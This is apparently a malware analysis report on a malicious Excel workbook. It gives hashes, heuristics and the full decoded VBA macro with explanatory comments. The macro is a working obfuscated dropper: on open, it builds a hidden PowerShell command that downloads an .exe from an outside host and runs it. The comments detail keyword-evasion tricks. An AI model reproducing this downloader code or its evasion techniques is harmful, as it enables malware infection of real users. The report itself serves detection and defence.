Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 61a35081cf789d8f…

MALICIOUS

Office (OLE)

Size: 52.0 KB · Created: 2017-10-19 07:59:05 · Authoring application: Microsoft Excel · First seen: 2018-10-07
MD5: f4e66a774db4094809efa8ac1e7b17c1 SHA-1: 7ed7cf22f82cdc397eafbabea5abcba61b805442 SHA-256: 61a35081cf789d8fb750b7312a54d4b9137ee498b572be951b3d1a80d46cf3a3
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1204.002 User Execution: Malicious File · T1059 Command and Scripting Interpreter

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that uses the Shell() function. The command passed to Shell() is obfuscated by string concatenation spread across many small helper functions, which reassemble 'cmd /c' followed by a PowerShell invocation. The macro's intent is to download and execute a second-stage payload: the extracted source contains a split-up http:// URL, a ".exe" filename built from a random number, and what appears to be a reference to the user's Desktop folder, consistent with the critical heuristic firings and the nature of the Shell() call. The document body's Japanese text and yellow message bar are a common lure to enable macros.

Heuristics 5

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3231 bytes
SHA-256: 3aff8fe7acc4afd7b10bc38f258ab40134e3172410c7191d3c9cb52c2ba09c03
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Fragment builder: joins split string literals (plus the output of versusgame)
' into part of a PowerShell "-f" format-string expression. No single literal
' holds a recognisable keyword, which is what OLE_VBA_SPLIT_KEYWORD_OBFUSCATION flags.
Function yogaindiaa()
shabolaaa = "VI" + "r'" + ",'N" + "t'," + "'mE') ;  "
yogaindiaa = "$7d" + "0mK6 = [" + versusgame + "}{2" + "}\"" -f '" + "on'" + ",'eN" + shabolaaa
End Function
' Fragment builder consumed by yogaindiaa: the "{1}{0}{3}" placeholder part of
' a PowerShell format template, split so no literal contains a whole token.
Function versusgame()
versusgame = "Typ" + "e](\""{" + "1}{0" + "}{3"
End Function

' Fragment builder used at the start of the "perlitdiamond" section in Workbook_Open.
' Contains a backtick inside a brace token ("{D`e"), i.e. the PowerShell escape
' character is used to break up a word as a further layer of keyword evasion.
Function diplodosea()
palmaoils = "{D`e" + "s} =  $7d"
diplodosea = "d" + "o{&(\""{1}" + "{0}\"" -f'ep','" + "sle'" + ") 31;$" + palmaoils
End Function
' Fragment builder: a seven-placeholder "-f" format template together with the
' first entries of its argument list. Workbook_Open appends the remaining
' arguments (".Ne','enT','t.WeB','ClI')") so the type name is never in one literal.
Function dabalokok()
dabalokok = "(\""{" + "0}" + "{2}{" + "1}{3}{" + "5}{6}" + "{4}\""" + "-f'" + "S" + "y','t" + "e','s" + "','m"
End Function

' Middle piece of a method name split across three call sites: Workbook_Open
' places it between "dOwNL" and "VokE" (the download step the report describes).
Function hablloker()
hablloker = "OaDfiLE.IN"
End Function
' Command-line switch fragments for the PowerShell invocation built in
' samoevsbruna; letter case is randomised, which defeats case-sensitive matching.
Function gemeremi()
gemeremi = "oP" + "Ro" + "FI -W"
End Function
' Further switch fragments appended by samoevsbruna (continues the "-W ... H iD" token
' and starts the next "-n..." switch).
Function gyroskopius()
gyroskopius = "d" + "en" + " -n"
End Function

' Switch fragment consumed by abigalevermont ("-" + "nON" + "inT" + "eR" + "a" ...).
Function flibaloba()
flibaloba = "nON" + "inT"
End Function
' Tail of the "...P b" + "yP" + ... switch built in abigalevermont; the single
' letter "a" is routed through a local variable purely to avoid a readable literal.
Function curveastell()
bermudass = "a"
curveastell = bermudass + "ss  " + "  """
End Function
' Assembles the interpreter prefix: samoevsbruna (cmd + PowerShell launcher)
' followed by the execution-policy / interactivity switches. Note the mix of
' "+" and "&" concatenation operators - both join strings here, and alternating
' them is presumably another attempt to vary the pattern scanners look for.
Function abigalevermont()
abigalevermont = samoevsbruna + "o -" + flibaloba + "eR" & "a -Ex" + "eC" & "uTI" + "On" + "P b" + "yP" + curveastell
End Function

' Builds the launcher: "c"+"m"+"d"+" /"+"c" (the 'cmd /c' the report refers to)
' and "p"+"Ow"+"Er"+"sHe"+"Ll" with hidden-window / no-profile style switches
' contributed by gemeremi and gyroskopius. Neither "cmd" nor "powershell" appears
' as a whole literal anywhere in the module.
Function samoevsbruna()
samoevsbruna = "c" + "m" + "d  " + " /" + "c""" & "p" + "Ow" + "Er" + "sHe" + "Ll" + " -n" + gemeremi + "in " + " H" & "iD" + gyroskopius + "oL"
End Function
' Completes the folder name started with "De" in Workbook_Open (line building
' perlitdiamond); together with digitpiii this appears to name the drop
' directory for the downloaded file - confirm against the decoded command.
Function terraincognitoo()
terraincognitoo = "skt" + "op"
End Function
' Auto-run entry point: Excel executes this when the workbook is opened and macros
' are enabled (heuristic OLE_VBA_WBOPEN). It concatenates the fragment functions
' above into one command line and hands it to Shell(); that call is the only
' execution sink in the module, so EXCEL.EXE spawning a cmd/PowerShell child is the
' process-tree signal to alert on.
Sub Workbook_Open()
vintagenioe = "p"   ' assigned but never read
' Guard on an Office object-model constant. NOTE(review): the mso*Mixed constants are
' negative, so this is expected to be true inside Excel; an emulator that leaves the
' name undefined may take a different path - confirm.
If msoArrowheadWidthMixed < 0.87 Then
Dim planeverythink As String
' Window-style argument for Shell(), derived from another Office enum constant;
' presumably resolves to a hidden window - confirm the enum value.
ernestohimm = msoColorTypeCMYK - 3
Randomize
planeverythink = Int(Rnd * 9882761#)   ' random integer coerced to String
deathlifeone = planeverythink          ' filename stem of the dropped executable

' Download step: remaining "-f" arguments for dabalokok's template, the split
' method name ("dOwNL" + hablloker + "VokE"), the URL split across literals
' ("ht"+"t"+"p:/"+"/..." - reassemble it for the network IoC) and the target path
' "$Des\<random>.exe".
antaaaanana = dabalokok + ".Ne','enT','t.WeB','ClI')).dOwNL" + hablloker + "VokE(\""ht" + "t" + "p:/" + "/gober" + "tonis.c" + "om/n" + "ote\"",\""$" + "Des\" + deathlifeone + ".e" + "xe\"")}"

' Variable setup for the drop directory ("...::gE" + digitpiii + "TH(" + "De" + terraincognitoo)
' followed by an object-creation expression built from a split "-f" template.
perlitdiamond = diplodosea + "0mk" + "6::gE" + digitpiii + "TH(\""De" + terraincognitoo + "\"")" + ";(&(" + "\""{0}{1" + "}{2}\""" + " -f'N" + "e','w-" + "','O" + "bj" + "ect') "
' Execution step: hippporose supplies the retry loop and launcher, the same random
' name selects the file just downloaded.
inicedays = hippporose + deathlifeone + ".ex" + "e"""

' Final order: launcher prefix, type setup, drop-path setup, download, execute.
gabrieleanna = abigalevermont + yogaindiaa + perlitdiamond + antaaaanana + inicedays

Shell gabrieleanna, ernestohimm
End If
End Sub
' Middle of a split static-method name ("6::gE" + this + "TH(") used in Workbook_Open
' to resolve the drop directory.
Function digitpiii()
digitpiii = "tFo" + "Ld" + "eR" + "Pa"
End Function


' Remaining "-f" argument-list fragments for the launcher expression in hippporose,
' ending with the start of the "$D" + "e" + "s\" path variable.
Function shipseariver()
shipseariver = "s" + "s'," + "'ar" + "t'," + "'-" + "Pr')" + " $D"
End Function
' Builds the execution stage: a PowerShell loop keyed on the last command's status
' ("whi"+"le("+"!${?}"+")"), then a format-string expression whose placeholder
' indices come from nulliggg and whose arguments come from shipseariver, ending in
' the "$Des\" path that Workbook_Open completes with the random .exe name.
' "544 < 877533" is an always-true opaque predicate; it never changes control flow.
Function hippporose()



If 544 < 877533 Then

hippporose = "whi" + "le(" + "!${?}" + ");&(\""{" + nulliggg + "t','o" + "ce" + shipseariver + "e" + "s\"
End If
End Function
' Placeholder order "{0}{2}{3}{1}" plus the opening of the "-f" argument list,
' consumed by hippporose; the reordered indices hide the word the arguments spell.
Function nulliggg()
nulliggg = "0}{" + "2}{3" + "}{1}" + "\""-f 'S"
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True